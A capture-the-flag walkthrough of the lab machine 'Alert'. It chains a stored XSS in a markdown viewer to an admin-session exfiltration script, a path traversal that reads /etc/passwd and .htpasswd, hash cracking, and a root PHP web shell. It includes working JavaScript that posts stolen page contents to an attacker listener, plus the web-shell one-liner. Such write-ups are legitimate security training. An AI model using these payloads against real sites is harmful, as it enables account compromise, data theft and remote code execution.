‼️Alert

Nmap scan


The URLs seem to follow the form http://alert.htb/index.php?page=<page>

Path traversal through the page parameter does not work from there, so let's recon a bit more.

Filter out responses with a size of 690 (what every non-existent page name returns) so we can see which page names actually exist.

“messages” seems interesting. Let's also enumerate subdomains.

Let's have a look.

Hmm, better to leave statistics aside for now. In the "About" section we see some useful info.

Let's get back to the markdown visualizer and check whether it has vulnerabilities we can exploit.

Since it lets you render markdown, we can try to inject some JavaScript (XSS).

And indeed it works: the viewer renders our script instead of escaping it.

So the idea is to make the admin read the messages page and send its contents to us. How? The "About" page states that the admins are quick to read the messages sent to them, so we use the share mechanism of the markdown viewer to create a shared link to a malicious markdown document, send it to the administrators and wait for them to open it.

We create a markdown document with an embedded script that sets the page we want to read, points at our IP and listener port, fetches the target page and sends its content back to us. Because the script runs in the admin's browser on the site's own origin, the fetch carries the admin's session and is not blocked by the same-origin policy. On our side we need a netcat listener (nc -nvlp 4444) on the port configured in the payload.

Once we have rendered the markdown, click the 'share' button, copy the link and send it to the admins.

After a couple of seconds, our listener receives the page content.

The page the admin sees links directly to a message file:

messages.php?file=2024-03-10_15-48-34.txt

A file name passed straight to the page smells like a path traversal. Let's try to read /etc/passwd using the same exfiltration technique.

We set the target URI in the payload to: messages.php?file=../../../../../../etc/passwd
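The writeup only describes the payload in prose, so here is an added example (not the author's own script) of the markdown/XSS payload builder and the exfiltration routine that runs in the admin's browser. It serves both the first exfiltration of the messages page and the /etc/passwd traversal above: the target is just a parameter. Assumed, not taken from the page: the attacker IP 10.10.14.5, that the viewer passes raw <script> tags through unchanged, and that messages.php sits at the site root of alert.htb.

```javascript
// Added example, not code from the original writeup. Builds the markdown/XSS
// payload the text describes and contains the logic that runs in the admin's
// browser. Assumptions (not stated on the page): the viewer renders raw
// <script> tags, messages.php lives at the site root, and our listener is the
// hypothetical 10.10.14.5:4444 (the port matches the nc -nvlp 4444 listener).

const ATTACKER_HOST = '10.10.14.5'; // assumption: attacker VPN address
const ATTACKER_PORT = 4444;

// Runs in the victim's browser. Fetches a same-origin page (the admin's
// session cookie goes along automatically) and POSTs the body to the
// listener. fetchImpl is injectable so the function can be tested offline.
async function exfiltrate(targetPath, listenerUrl, fetchImpl) {
  const f = fetchImpl || fetch;
  const body = await (await f(targetPath)).text();
  // no-cors + plain text body is a "simple" request: no CORS preflight, so a
  // bare netcat listener receives the POST even though it never answers CORS.
  await f(listenerUrl, { method: 'POST', mode: 'no-cors', body });
  return body;
}

// The server-side page we want the admin to read for us. Traversal works
// because messages.php opens whatever the file parameter names.
function messagePath(file) {
  return '/messages.php?file=' + file;
}

// Markdown document to upload and share. The script is the exfiltrate()
// function above, serialised, plus a call with the chosen target.
function buildPayload(targetPath, host = ATTACKER_HOST, port = ATTACKER_PORT) {
  const listener = `http://${host}:${port}/`;
  return [
    '# Hi admin, please read this',
    '',
    '<script>',
    exfiltrate.toString(),
    `exfiltrate(${JSON.stringify(targetPath)}, ${JSON.stringify(listener)});`,
    '</script>',
    '',
  ].join('\n');
}

// Write the output to a .md file, upload it to the viewer, share the link.
// First run: messagePath('') to read the message index; second run: the
// traversal path below to read /etc/passwd.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(buildPayload(messagePath('../../../../../../etc/passwd')));
}
```

The netcat listener prints the raw HTTP POST, so the exfiltrated page body appears after the request headers. If the target responds slowly or the body is large, a real HTTP listener (or chunking the body) is more reliable than netcat, which closes after the first request.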

It worked!

We now know that albert and david are the only usable users other than root: they are the only ones with a real login shell.

We tried /etc/shadow as well: not readable, so the web server runs as a non-root user.

Let's try /etc/hosts ... nothing more than what we already found.

We went back to fuzz the statistics vhost we had left behind, but everything responded with 401, so we filter those out.

That is actually good news: a 401 means HTTP authentication in front of it, and the .htpasswd file that holds those credentials could leak password hashes if it is readable. Let's use the same technique to exfiltrate /var/www/<site>/.htpasswd

Let's go! It's an Apache APR1 MD5 hash ($apr1$), so save it to a file and crack it with hashcat in dictionary mode (-a 0; mode 1600 is Apache MD5): hashcat -a 0 -m 1600 ./shadow.txt /usr/share/wordlists/rockyou.txt

SSH into the machine as albert with the cracked password, grab the user flag and look around for privilege escalation.

No sudo -l entries, no cron jobs, but some open sockets bound to localhost...

Let's make this port reachable from our machine with an SSH local port forward and connect to it:

ssh -L 8080:127.0.0.1:8080 albert@10.10.11.44

Nothing interesting in the web interface itself, so let's find out more about the process behind it.

The process runs as root, so this must be the way in...

We can write to the application's config folder, which is served by the root-owned PHP process, so we can drop a PHP web shell there:

<?php system($_GET['cmd']); ?>

and reach it through the forwarded port: http://127.0.0.1:8080/config/shell.php

Let's test it with a whoami command (?cmd=whoami); since the process runs as root, so do our commands.

Let's get our flag.

http://127.0.0.1:8080/config/shell.php?cmd=cat%20/root/root.txt

And we're done.
